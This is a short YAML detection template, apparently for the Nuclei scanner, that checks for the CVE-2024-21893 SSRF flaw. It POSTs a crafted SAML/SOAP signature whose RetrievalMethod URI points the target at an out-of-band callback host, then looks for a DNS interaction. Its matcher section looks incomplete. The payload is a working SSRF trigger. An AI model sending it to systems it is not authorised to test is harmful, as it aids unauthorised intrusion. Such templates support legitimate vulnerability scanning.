CVE-2024-21893.yaml

id: CVE-2024-21893
info:
  name: SSRF Detection for CVE-2024-21893 only
  author: Valentin Lobstein
  severity: high

http:
  - method: POST
    headers:
      Content-Type: text/xml
    body: |
      <?xml version="1.0" encoding="UTF-8"?>
      <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
        <soap:Body>
          <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
            <ds:SignedInfo>
              <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
              <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
            </ds:SignedInfo>
            <ds:SignatureValue>dummy</ds:SignatureValue>
            <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig#">
              <ds:RetrievalMethod URI="http://{{interactsh-url}}"/> 
              <ds:X509Data/>
            </ds:KeyInfo>
            <ds:Object></ds:Object>
          </ds:Signature>
        </soap:Body>
      </soap:Envelope>
    path:
      - "{{BaseURL}}/dana-ws/saml20.ws"
    matchers-condition: and
    extractors:
      - type: regex
        part: interactsh_protocol
        regex:
          - "dns"